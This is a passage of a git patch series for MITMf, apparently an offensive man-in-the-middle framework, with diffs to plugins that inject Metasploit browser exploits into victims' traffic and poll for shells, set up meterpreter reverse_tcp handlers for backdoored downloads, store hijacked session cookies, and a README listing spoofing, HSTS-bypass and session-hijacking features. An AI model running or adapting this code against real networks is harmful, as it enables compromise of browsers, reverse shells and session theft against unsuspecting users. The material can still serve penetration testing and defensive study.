Enjoy!".format(ip)) + self.sploited_ips.append(ip) + self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped + self.html_payload = self.get_payload() # restart the BrowserProfiler plugin + return + poll_n += 1 sleep(2) - if exit_loop is False: #We didn't get a shell :( - mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip)) - + mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip)) self.html_payload = self.get_payload() # restart the BrowserProfiler plugin def snipe(self): @@ -196,26 +175,20 @@ class BrowserSniper(BrowserProfiler, Plugin): elif exploits and (vic_ip not in self.sploited_ips): mitmf_logger.info("{} [BrowserSniper] Client vulnerable to {} exploits".format(vic_ip, len(exploits))) - inject_payload = '' + msf = Msf() for exploit in exploits: - jobs = self.msf.call('job.list') #get running jobs - if jobs: - for pid, name in jobs.iteritems(): - info = self.msf.call('job.info', [pid]) - if (exploit in info['name']): - mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit)) - url = info['uripath'] #get the url assigned to the exploit - inject_payload += "".format(self.msfip, msfport, url) - else: - url, port = self._setupExploit(exploit, msfport) - inject_payload += "".format(self.msfip, port, url) + pid = msf.findpid(exploit) + if pid: + mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit)) + url = msf.jobinfo(pid)['uripath'] #get the url assigned to the exploit + inject_payload += "".format(self.msfip, msfport, url) else: url, port = self._setupExploit(exploit, msfport) inject_payload += "".format(self.msfip, port, url) - + self.injectAndPoll(vic_ip, inject_payload) sleep(1) diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 64f977a..2d40f54 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -68,7 +68,7 @@ import multiprocessing from libs.bdfactory import pebin from libs.bdfactory import elfbin from libs.bdfactory import machobin -from core.msfrpc import Msfrpc +from core.msfrpc import Msf from core.utils import shutdown from plugins.plugin import Plugin from tempfile import mkstemp @@ -126,26 +126,15 @@ class FilePwn(Plugin): self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist'] - #Metasploit options - msfcfg = self.config['MITMf']['Metasploit'] - rpcip = msfcfg['rpcip'] - rpcpass = msfcfg['rpcpass'] + msfversion = Msf().version() + self.tree_info.append("Connected to Metasploit v{}".format(msfversion)) - try: - msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary - msf.login('msf', rpcpass) - version = msf.call('core.version')['version'] - self.tree_info.append("Connected to Metasploit v{}".format(version)) - - t = threading.Thread(name='setupMSF', target=self.setupMSF, args=(msf,)) - t.setDaemon(True) - t.start() - except Exception: - shutdown("[-] Error connecting to MSF! 
Make sure you started Metasploit and its MSGRPC server") + t = threading.Thread(name='setupMSF', target=self.setupMSF) + t.setDaemon(True) + t.start() - def setupMSF(self, msf): - - jobs = msf.call('job.list') + def setupMSF(self): + msf = Msf() for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: cmd = "use exploit/multi/handler\n" cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) @@ -154,21 +143,16 @@ class FilePwn(Plugin): cmd += "set ExitOnSession False\n" cmd += "exploit -j\n" - if jobs: - for pid, name in jobs.iteritems(): - info = msf.call('job.info', [pid]) - if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']): - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) + pid = msf.findpid('multi/handler') + if pid: + info = msf.jobinfo(pid) + if (info['datastore']['payload'] == config["MSFPAYLOAD"]) and (info['datastore']['LPORT'] == config["PORT"]) and (info['datastore']['lhost'] != config['HOST']): + msf.killjob(pid) + msf.sendcommand(cmd) + else: + msf.sendcommand(cmd) else: - #Create a virtual console - c_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [c_id, cmd]) + msf.sendcommand(cmd) def onConfigChange(self): self.initialize(self.options) diff --git a/plugins/Screenshotter.py b/plugins/Screenshotter.py index 5e32555..eae51ee 100644 --- a/plugins/Screenshotter.py +++ b/plugins/Screenshotter.py @@ -37,7 +37,7 @@ class ScreenShotter(Inject, Plugin): has_opts = True def initialize(self, options): - self.interval = options.interval + self.interval = 10 or options.interval Inject.initialize(self, options) self.html_payload = self.get_payload() @@ -60,4 +60,4 @@ class ScreenShotter(Inject, Plugin): return '' def pluginOptions(self, options): - options.add_argument("--interval", dest="interval", type=int, metavar="SECONDS", default=10, help="Interval at which screenshots will be taken (default 10 seconds)") \ No newline at end of file + options.add_argument("--interval", dest="interval", type=int, metavar="SECONDS", default=None, help="Interval at which screenshots will be taken (default 10 seconds)") \ No newline at end of file From 946ba0b365eddff81fdc1b8828b3545ef68eb782 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 19 May 2015 00:08:44 +0200 Subject: [PATCH 20/20] updated readme --- README.md | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 1008bb1..7b03c09 100644 --- a/README.md +++ b/README.md @@ -16,12 +16,13 @@ Contact me at: Available plugins ================= +- ```Screenshotter``` - Uses HTML5 Canvas to render an accurate screenshot of a clients browser - ```Responder``` - LLMNR, NBT-NS, WPAD and MDNS poisoner - ```SSLstrip+``` - Partially bypass HSTS - ```Spoof``` - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing - ```BeEFAutorun``` - Autoruns BeEF modules based on clients OS or browser type - ```AppCachePoison``` - Perform App cache poisoning attacks -- ```Ferret-NG``` - Transparently hijacks sessions +- ```Ferret-NG``` - Tranperently hijacks sessions - ```BrowserProfiler``` - Attempts to enumerate all browser plugins of connected clients - ```CacheKill``` - Kills page caching by 
modifying headers - ```FilePwn``` - Backdoor executables being sent over HTTP using the Backdoor Factory and BDFProxy @@ -35,6 +36,10 @@ Available plugins Changelog ========= +- ```SessionHijacker``` is replaced with ```Ferret-NG```, captures cookies and starts a proxy that will feed them to connected clients + +- Addition of the ```Screenshotter``` plugin, able to render screenshots of a client's browser at regular intervals + - Addition of a fully functional SMB server using the [Impacket](https://github.com/CoreSecurity/impacket) library - Addition of [DNSChef](https://github.com/iphelix/dnschef), the framework is now an IPv4/IPv6 (TCP & UDP) DNS server! Supported queries are: 'A', 'AAAA', 'MX', 'PTR', 'NS', 'CNAME', 'TXT', 'SOA', 'NAPTR', 'SRV', 'DNSKEY' and 'RRSIG' @@ -46,8 +51,6 @@ Changelog - Integrated [SSLstrip+](https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014 -- Addition of the ```Ferret-NG``` plugin, which uses code from [FireLamb](https://github.com/sensepost/mana/tree/master/firelamb) to store cookies in a Firefox profile - - ```Spoof``` plugin can now exploit the 'ShellShock' bug when DHCP spoofing! - ```Spoof``` plugin now supports ICMP, ARP and DHCP spoofing
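Usage note on the reworked Ferret-NG cookie store: sessions are now kept per client IP as a list of `{'host', 'cookie'}` entries, `finish()` serializes that dictionary with `str()`, and `--load-cookies` rebuilds it with `ast.literal_eval()` before handing it to `URLMonitor`. A minimal sketch of the on-disk format (the IP, host, cookie value and file name below are placeholders; the plugin itself writes under `./logs/ferret-ng/`):

```python
import ast

# Per-client session store, in the shape Ferret-NG's URLMonitor now keeps it
# and finish() writes it out; all values here are placeholders.
cookies = {
    '192.0.2.55': [
        {'host': 'example.com', 'cookie': 'PHPSESSID=deadbeef'},
    ],
}

# What finish() does: dump the store as its Python literal representation
with open('cookies-example.log', 'w') as log:
    log.write(str(cookies))

# What --load-cookies does: parse the literal back into the same structure
with open('cookies-example.log', 'r') as log:
    restored = ast.literal_eval(log.read())

assert restored == cookies
```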
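Usage note on the `Msf` wrapper added to `core/msfrpc.py`: BrowserSniper and FilePwn now drive Metasploit through it instead of each building their own `Msfrpc` client and virtual consoles. A minimal sketch of the intended pattern, assuming `./config/mitmf.conf` carries valid Metasploit `rpcip`/`rpcpass` settings and msfrpcd's MSGRPC server is already running (the payload, LHOST and peer address are placeholders):

```python
from core.msfrpc import Msf

msf = Msf()  # logs in using the [MITMf][Metasploit] settings from the config file
print "Connected to Metasploit v{}".format(msf.version())

# Queue a handler; sendcommand() creates the virtual console internally
msf.sendcommand("use exploit/multi/handler\n"
                "set payload windows/meterpreter/reverse_tcp\n"
                "set LHOST 192.0.2.1\n"
                "set ExitOnSession False\n"
                "exploit -j\n")

# Look the job up by name and inspect it
pid = msf.findpid('multi/handler')
if pid:
    print "Handler job info: {}".format(msf.jobinfo(pid))

# Check whether a given client has sent a session back
if msf.sessionsfrompeer('192.0.2.55'):
    print "Got a session from 192.0.2.55"
```

Keeping console creation inside `sendcommand()` is what lets the plugins drop their duplicated `console.create`/`console.write` calls.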